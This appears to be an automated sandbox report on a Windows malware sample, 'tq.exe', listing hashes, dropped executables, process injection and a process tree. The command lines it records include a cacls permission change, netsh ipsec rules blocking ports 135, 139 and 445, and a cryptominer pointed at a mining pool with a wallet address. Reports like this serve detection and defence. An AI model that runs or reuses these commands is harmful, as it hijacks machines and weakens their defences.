Analysis
  max time kernel: 123s
  max time network: 148s
  platform: windows7_x64
  resource: win7v20210410
  submitted: 07-05-2021 13:02
  Static task: static1
  Behavioral task: behavioral1 (sample: tq.exe, resource: win7v20210410)
  Behavioral task: behavioral2 (sample: tq.exe, resource: win10v20210408)
General
  Target: tq.exe
  Size: 418KB
  MD5: e8450e61f061fd90d74507eb04845ecd
  SHA1: f344f20c57f9cb01ea3166f3404336da1519a832
  SHA256: 0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
  SHA512: d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
- Downloads MZ/PE file
- Executes dropped EXE (8 IoCs)
  pid | process
  852 | MS19.exe
  1680 | MS20.exe
  580 | MSSQLH.exe
  276 |
  1104 | RunDllExe.exe
  604 | RunDllExe.exe
  1988 | x64.exe
  1064 | wudfhosts.exe
- Registers new Print Monitor (2 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Resources matching a YARA rule
  resource | yara_rule
  \Users\Admin\AppData\Local\Temp\x64.exe | upx
  C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
  \Users\Admin\AppData\Local\Temp\x64.exe | upx
  C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
  C:\Windows\Cursors\wudfhosts.exe | upx
  C:\Windows\Cursors\WUDFhosts.exe | upx
  \Windows\Cursors\WUDFhosts.exe | upx
- Loads dropped DLL (10 IoCs)
  pid | process
  1864 | tq.exe
  1532 |
  1864 | tq.exe
  1684 |
  1864 | tq.exe
  1864 | tq.exe
  580 | MSSQLH.exe
  580 | MSSQLH.exe
  1864 | svchost.exe
  1532 | svchost.exe
- Drops file in System32 directory (2 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | svchost.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt | svchost.exe
- Suspicious use of SetThreadContext (3 IoCs)
  description | pid | process | target process
  PID 1104 set thread context of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 604 set thread context of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 1864 set thread context of 1532 | 1864 | svchost.exe | svchost.exe
- Drops file in Windows directory (18 IoCs)
  description | ioc | process
  File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
  File opened for modification | C:\Windows\Logs\RunDllExe.dll | RunDllExe.exe
  File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
  File created | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
  File created | C:\Windows\Logs\RunDllExe | MSSQLH.exe
  File created | C:\Windows\MpMgSvc.dll | MSSQLH.exe
  File created | C:\Windows\Logs\Vers.txt | MSSQLH.exe
  File opened for modification | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
  File created | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
  File created | C:\Windows\Help\active_desktop_render.dll | x64.exe
  File opened for modification | C:\Windows\Help\active_desktop_render.dll | svchost.exe
  File created | C:\Windows\Logs\RunDllExe.exe | MSSQLH.exe
  File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
  File opened for modification | C:\Windows\Logs\RunDllExe.dll | RunDllExe.exe
  File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
  File created | C:\Windows\Help\active_desktop_render_New.dll | svchost.exe
  File created | C:\Windows\Logs\RunDllExe.dll | MSSQLH.exe
  File created | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
- Modifies data under HKEY_USERS (24 IoCs)
  description | ioc | process
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1" | svchost.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e0cdaec44143d701 | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" | svchost.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | svchost.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a07000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77 | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network" | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | svchost.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32} | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0" | svchost.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" | svchost.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e0cdaec44143d701 | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | process
  580 | MSSQLH.exe
  1532 | svchost.exe
  1532 | svchost.exe
  1532 | svchost.exe
  1532 | svchost.exe
  1532 | svchost.exe
- Suspicious use of AdjustPrivilegeToken (34 IoCs)
  description | pid | process
  Token: SeImpersonatePrivilege | 1680 | MS20.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 580 | MSSQLH.exe
  Token: SeBackupPrivilege | 580 | MSSQLH.exe
  Token: SeSecurityPrivilege | 580 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege | 580 | MSSQLH.exe
  Token: SeRestorePrivilege | 1532 | svchost.exe
  Token: SeBackupPrivilege | 1532 | svchost.exe
  Token: SeSecurityPrivilege | 1532 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 1532 | svchost.exe
  Token: SeLockMemoryPrivilege | 1064 | wudfhosts.exe
- Suspicious use of SetWindowsHookEx (8 IoCs)
  pid | process
  1864 | tq.exe
  580 | MSSQLH.exe
  1104 | RunDllExe.exe
  604 | RunDllExe.exe
  1988 | x64.exe
  1864 | svchost.exe
  1532 | svchost.exe
  1532 | svchost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | process | target process
  PID 1864 wrote to memory of 852 | 1864 | tq.exe | MS19.exe
  PID 1864 wrote to memory of 852 | 1864 | tq.exe | MS19.exe
  PID 1864 wrote to memory of 852 | 1864 | tq.exe | MS19.exe
  PID 1864 wrote to memory of 852 | 1864 | tq.exe | MS19.exe
  PID 1864 wrote to memory of 1680 | 1864 | tq.exe | MS20.exe
  PID 1864 wrote to memory of 1680 | 1864 | tq.exe | MS20.exe
  PID 1864 wrote to memory of 1680 | 1864 | tq.exe | MS20.exe
  PID 1864 wrote to memory of 1680 | 1864 | tq.exe | MS20.exe
  PID 1864 wrote to memory of 580 | 1864 | tq.exe | MSSQLH.exe
  PID 1864 wrote to memory of 580 | 1864 | tq.exe | MSSQLH.exe
  PID 1864 wrote to memory of 580 | 1864 | tq.exe | MSSQLH.exe
  PID 1864 wrote to memory of 580 | 1864 | tq.exe | MSSQLH.exe
  PID 580 wrote to memory of 324 | 580 | MSSQLH.exe | cacls.exe
  PID 580 wrote to memory of 324 | 580 | MSSQLH.exe | cacls.exe
  PID 580 wrote to memory of 324 | 580 | MSSQLH.exe | cacls.exe
  PID 580 wrote to memory of 324 | 580 | MSSQLH.exe | cacls.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 1104 wrote to memory of 332 | 1104 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 604 wrote to memory of 596 | 604 | RunDllExe.exe | svchost.exe
  PID 580 wrote to memory of 1988 | 580 | MSSQLH.exe | x64.exe
  PID 580 wrote to memory of 1988 | 580 | MSSQLH.exe | x64.exe
  PID 580 wrote to memory of 1988 | 580 | MSSQLH.exe | x64.exe
  PID 580 wrote to memory of 1988 | 580 | MSSQLH.exe | x64.exe
  PID 1988 wrote to memory of 1676 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1676 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1676 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1676 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 572 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 572 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 572 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 572 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 324 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 324 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 324 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 324 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1176 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1176 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1176 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1176 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1444 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1444 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1444 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1444 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1092 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1092 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1092 | 1988 | x64.exe | netsh.exe
  PID 1988 wrote to memory of 1092 | 1988 | x64.exe | netsh.exe
Processes (process tree: image path, command line, and the signatures triggered by each process; indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\tq.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\tq.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\MS19.exe
        command line: C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
        - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\MS20.exe
        command line: C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
        command line: C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\cacls.exe
              command line: cacls C:\Windows\Fonts\*.exe /e /d system
            C:\Users\Admin\AppData\Local\Temp\x64.exe
              command line: x64.exe
              - Executes dropped EXE
              - Drops file in Windows directory
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add policy name=Block
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filterlist name=Filter1
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
                  C:\Windows\SysWOW64\netsh.exe
                    command line: netsh ipsec static set policy name=Block assign=y
                  C:\Windows\SysWOW64\cmd.exe
                    command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"

C:\Windows\Logs\RunDllExe.exe
  command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\svchost.exe
        command line: C:\Windows\system32\svchost.exe

C:\Windows\Logs\RunDllExe.exe
  command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\svchost.exe
        command line: C:\Windows\system32\svchost.exe

C:\Windows\SysWOW64\svchost.exe
  command line: C:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\svchost.exe
        command line: C:\Windows\system32\svchost.exe
        - Loads dropped DLL
        - Drops file in System32 directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
            C:\Windows\Cursors\wudfhosts.exe
              command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads